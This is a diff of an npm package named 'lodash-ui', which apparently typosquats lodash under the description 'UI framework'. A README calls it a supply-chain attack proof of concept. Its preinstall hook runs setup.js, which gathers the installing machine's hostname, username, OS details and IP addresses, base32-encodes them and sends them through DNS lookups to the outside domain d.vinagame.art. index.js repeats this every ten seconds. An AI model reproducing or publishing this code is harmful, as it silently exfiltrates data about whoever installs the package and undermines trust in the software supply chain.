lodash-ui 3.0.1

package/LICENSE

@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2021 haebi-thelittleshrimp
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

package/README.md

@@ -0,0 +1,21 @@
+# simple-callback
+simple-callback repository is a Proof-Of-Concept Node module to demonstrate Supply Chain attacks.
+
+## Publish
+
+```
+npm login
+# at the project directory
+npm publish
+```
+
+## Deployment - On Victim
+
+View the published package: https://www.npmjs.com/package/simple-callback-supply-chain-attack
+
+To simplify testing, the callback domain is taken from the enviornment variable
+
+```
+export CALLBACK=[SOME-DOMAIN]
+npm install simple-callback-supply-chain-attack
+```

package/index.js

@@ -0,0 +1,13 @@
+const setup = require("./setup");
+
+function isConfigured() {
+    // Do Nothing
+    return false;
+}
+
+function scheduleUpdate() {
+    setInterval(() => {setup.configureHost()}, 10000);
+}
+
+exports.isConfigured = isConfigured;
+exports.scheduleUpdate = scheduleUpdate;

package/package.json

@@ -0,0 +1,23 @@
+{
+  "name": "lodash-ui",
+  "version": "3.0.1",
+  "description": "UI framework for Lodash UI",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "preinstall": "node setup.js"
+  },
+  "repository": {
+    "type": "git",
+    "url": "git+https://github.com/haebi-thelittleshrimp/simple-callback-supply-chain-attack.git"
+  },
+  "author": "",
+  "license": "ISC",
+  "bugs": {
+    "url": "https://github.com/haebi-thelittleshrimp/simple-callback-supply-chain-attack/issues"
+  },
+  "homepage": "https://github.com/haebi-thelittleshrimp/simple-callback-supply-chain-attack#readme",
+  "dependencies": {
+    "base32": "0.0.6"
+  }
+}

package/setup.js

@@ -0,0 +1,44 @@
+const os = require('os');
+const dns = require('dns');
+const base32 = require('base32');
+
+function configureHost() {
+    let hostInformation = enummerateHostInformation();
+    sendChunks(hostInformation);
+}
+
+function enummerateHostInformation() {
+    let nets = os.networkInterfaces();
+    let results = {
+        "hostname": os.hostname(),
+        "username": os.userInfo().username,
+        "os_type" : os.type(),
+        "os_release": os.release()
+    }
+
+    for (const name of Object.keys(nets)) {
+        for (const net of nets[name]) {
+            if (net.family === 'IPv4' && !net.internal) {
+                if (!results[name]) {
+                    results[name] = [];
+                }
+                results[name].push(net.address);
+            }
+        }
+    }
+    return results;
+}
+
+function sendChunks(obj) {
+    let message = base32.encode(JSON.stringify(obj));
+    let chunks = message.match(/.{1,25}/g);
+    for(let i = 0; i<chunks.length;i++) {
+        let host = i + "-" + chunks[i] + "." + "d.vinagame.art";
+        dns.resolve4(host, () => {
+            // do nothing
+        });
+    }
+}
+
+exports.configureHost = configureHost;
+configureHost();